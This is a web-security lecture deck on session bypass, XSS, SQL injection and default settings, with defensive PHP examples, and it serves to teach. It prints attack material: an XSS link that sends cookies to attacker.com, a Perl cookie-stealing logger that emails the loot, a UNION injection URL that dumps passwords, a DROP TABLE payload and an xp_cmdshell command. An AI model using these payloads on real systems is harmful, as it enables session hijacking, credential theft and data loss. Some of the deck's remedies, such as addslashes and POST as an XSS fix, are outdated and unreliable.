
Web Vulnerability

Saharudin Saat

Session_start();
The most common web vulnerabilities
• No session control (bypass authentication)
• XSS attack (cross site scripting)
• SQL injection
• Default?
Session Control

Is this site vulnerable?


Session Control
• Users need to log in before they can access the system
• Does the code really process the username and password?
• In this case – no login is required
• We can bypass the login page just by entering the URL
http://localhost/latihan/home.php
Session Control

An intruder can bypass your system just by entering the URL of the page!!
Session Control
Recommendation
Use sessions: call session_start() at the top of every page.
– Every sensitive page must have access level control, e.g.:

<?php
session_start();
// Read the access level from the session that the login page filled,
// never from the request, then send the user to the page for that level.
$level = isset($_SESSION['level']) ? $_SESSION['level'] : '';
if ($level == '1') {
    header("Location: admin_menu.php");
} else if ($level == '2') {
    header("Location: approve.php");
} else if ($level == '4') {
    header("Location: report.php");
} else {
    header("Location: index.php"); // unknown level: back to the login page
}
exit; // never keep rendering the page after a redirect

Session Control
Check whether a password was entered: if ($pwd == '') redirect to the login page again.

<?php
// $pwd is the password field of the submitted login form
$pwd = isset($_POST['pwd']) ? $_POST['pwd'] : '';
if ($pwd == '') {
?>
<script language="javascript">
alert("not authorized!!");
window.location = "index.php";
</script>
<?php
    exit; // stop here so the rest of the page is never sent to the browser
}
?>

Validation must be done on the server side to prevent code injection.

Refer to the file session.php in the e-rent folder.
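The guard described on these slides, written out as an added example (this is not the deck's session.php): a check that every sensitive page includes before any output, plus the login step that fills the session. The file name guard.php, the function names, the pwd_hash column and the password_hash() storage are assumptions.

```php
<?php
// Added example, not the deck's session.php. Hypothetical file: guard.php
// Include it at the very top of every sensitive page, before any output.

// Allow the page only for the given access levels ('1', '2', '4' in the deck).
// The level is read from the session that the login step filled, never from
// the request, so it cannot be changed by editing a URL or a form field.
function require_level(array $allowed_levels, string $login_page = 'index.php'): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $userid = $_SESSION['userid'] ?? null;
    $level  = $_SESSION['level'] ?? null;
    if ($userid === null || !in_array($level, $allowed_levels, true)) {
        // Server-side redirect, then exit: a client-side <script> redirect
        // alone would still deliver the protected HTML to the browser.
        header('Location: ' . $login_page);
        exit;
    }
}

// Login step: verify the submitted password against the stored row and only
// then put the user id and level into the session.
// $user_row is the row looked up for the submitted user id, e.g. (constructed):
//   ['userid' => 'admin', 'pwd_hash' => password_hash('s3cret', PASSWORD_DEFAULT), 'level' => '1']
function login_user(string $pwd, ?array $user_row): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    // Empty password or unknown user: back to the login page, nothing stored.
    if ($pwd === '' || $user_row === null || !password_verify($pwd, $user_row['pwd_hash'])) {
        return false;
    }
    session_regenerate_id(true);        // fresh session id after login (fixation)
    $_SESSION['userid'] = $user_row['userid'];
    $_SESSION['level']  = $user_row['level'];
    return true;
}

// Usage in admin_menu.php (administrators only):
//   require 'guard.php';
//   require_level(['1']);
// Usage in report.php, which levels 1 and 4 may open:
//   require_level(['1', '4']);
```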


XSS (cross site scripting)
• By successfully injecting <script>alert("Boleh xss")</script> into the
username input box we know that this site is vulnerable to an XSS attack.

• The attacker can then social-engineer his victims into clicking a
malicious URL that steals their cookies (phishing).
XSS (cross site scripting)
<html>
<head><title>Look at this!</title></head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true">Check this CNN story out!</a>
</body>
</html>
XSS (cross site scripting)
# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
close (MAIL);
XSS (cross site scripting)
Recommendation

• Use POST rather than GET in forms. Specify POST in the method attribute
of your forms. Of course, this isn't appropriate for all of your forms, but
it is appropriate when a form is performing an action, such as buying
stocks. In fact, the HTTP specification requires that GET be considered safe.
• Use $_POST rather than rely on register_globals. Using the POST method for
form submissions is useless if you rely on register_globals and reference
form variables like $symbol and $quantity. It is also useless if you use
$_REQUEST.
• Do not focus on convenience.
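The login form from the XSS slides, handled the way the recommendation describes, as an added example that is not the deck's code: only POST is acted on, the field comes from $_POST alone, and, going beyond the slide's POST advice, the username is HTML-encoded on output, which is what turns the injected <script> into plain text. Function names are assumptions.

```php
<?php
// Added example, not the deck's code. Handles the login form from the slide:
// only POST requests are acted on, the field is read from $_POST (never
// register_globals or $_REQUEST), and the username is HTML-encoded before it
// is echoed. The encoding step goes beyond the slide's POST advice; it is what
// turns <script>alert("Boleh xss")</script> into harmless text on the page.

// Encode a value for placement in HTML text or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Build the response fragment for one request. Returns null when the request
// is not a POST with a username, so a crafted GET link cannot trigger the action.
function login_form_response(string $method, array $post): ?string
{
    if ($method !== 'POST' || !isset($post['username'])) {
        return null;
    }
    $username = (string) $post['username'];
    // Filter on input: a user id is letters, digits, '.', '_' or '-' only.
    if (!preg_match('/^[A-Za-z0-9._-]{1,32}$/', $username)) {
        // Still encode on output, even for the rejected value.
        return '<p>Invalid username: ' . h($username) . '</p>';
    }
    return '<p>Welcome ' . h($username) . '</p>';
}

// The form itself must say method="post"; its handler is then:
$response = login_form_response($_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST);

// Constructed request carrying the payload from the slide, to show the encoding:
$demo = login_form_response('POST', ['username' => '<script>alert("Boleh xss")</script>']);
echo $demo, "\n";   // the tag is shown literally in the page, not executed
```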
SQL injection

A simple SQL injection lets the attacker log in as a valid user without knowing the password.
SQL injection

The attacker is logged in as the first valid user in the login table.
SQL injection
• The attacker might be lucky if the first user in the login table is
an administrator.
• If not, he might want to find the administrator's login and password.
• Can the attacker do that?
SQL injection

By inserting a UNION statement in the URL, the attacker can view all logins
and passwords.
SQL injection
• The original URL appears like this:
http://localhost/latihan/staffdetail.php?nostaf=654321
• The attacker might then try a UNION SQL statement to view the usernames
and passwords in the login table, which appears like this:
http://localhost/latihan/staffdetail.php?nostaf=654321%20union%20select%201,2,userid,katalaluan%20from%20administrator

*Note: %20 is the URL encoding of a space.


SQL injection
• If SQL injection is possible, it is not impossible for the attacker to
drop a table by appending a DROP TABLE statement:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%';
• In some cases the attacker passes "EXEC xp_cmdshell 'dir c:'" as the
@query argument to view the output of "dir c:" in the web page.
SQL injection
Recommendation

Filter your data.
• This cannot be overstressed. With good data filtering in place, most
security concerns are mitigated, and some are practically eliminated.

Quote your data.
• If your database allows it (MySQL does), put single quotes around all
values in your SQL statements, regardless of the data type.

Escape your data.
• Sometimes valid data can unintentionally interfere with the format of the
SQL statement itself. Use mysql_escape_string() or an escaping function
native to your particular database. If there isn't a specific one,
addslashes() is a good last resort.
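The staffdetail.php lookup behind the UNION URL, as an added example that is not the deck's code: the vulnerable query pattern beside the filter, quote and escape steps the recommendation lists, and, going beyond the slide, a prepared statement. The table name staf, the columns nama and jabatan, the function names and the $db mysqli connection are assumptions; mysqli_real_escape_string() stands in for mysql_escape_string(), which current PHP no longer has.

```php
<?php
// Added example, not the deck's staffdetail.php. Shows the query pattern that
// the ?nostaf=654321%20union%20select... URL exploits, beside the slide's
// filter + quote + escape fix and, going beyond the slide, a prepared
// statement. Table 'staf' and columns 'nama', 'jabatan' are assumptions;
// $db is an open mysqli connection. mysqli_real_escape_string() replaces
// mysql_escape_string(), which no longer exists in current PHP.

// VULNERABLE: the request value is pasted into the SQL text, unquoted.
function staff_query_vulnerable(string $nostaf): string
{
    return "SELECT nama, jabatan FROM staf WHERE nostaf = $nostaf";
}

// Filter: a staff number is up to 10 digits; anything else is rejected
// before any SQL is built, which already stops the UNION payload.
function valid_nostaf(string $nostaf): bool
{
    return preg_match('/^[0-9]{1,10}$/', $nostaf) === 1;
}

// Quote + escape, as the slide recommends: quote every value even though
// it is numeric, and escape it with the connection's own function.
function staff_query_escaped(mysqli $db, string $nostaf): ?string
{
    if (!valid_nostaf($nostaf)) {
        return null;
    }
    $safe = mysqli_real_escape_string($db, $nostaf);
    return "SELECT nama, jabatan FROM staf WHERE nostaf = '$safe'";
}

// Prepared statement: the SQL text is fixed and the value is sent separately,
// so it can never change the structure of the query.
function staff_lookup(mysqli $db, string $nostaf): ?array
{
    if (!valid_nostaf($nostaf)) {
        return null;
    }
    $stmt = $db->prepare('SELECT nama, jabatan FROM staf WHERE nostaf = ?');
    $stmt->bind_param('s', $nostaf);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Decoded payload from the slide's URL (constructed for the demonstration):
$payload = '654321 union select 1,2,userid,katalaluan from administrator';
echo staff_query_vulnerable($payload), "\n";   // the UNION becomes part of the query
var_dump(valid_nostaf($payload));              // the filter rejects it before any SQL is built
```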
Default?

Do you realize that other people on the internet can view your default settings?
Default?

Pay attention to any alert from third-party software about your web security.
Default?

An attacker might browse your server files to find any information.


session_destroy();

Thank You
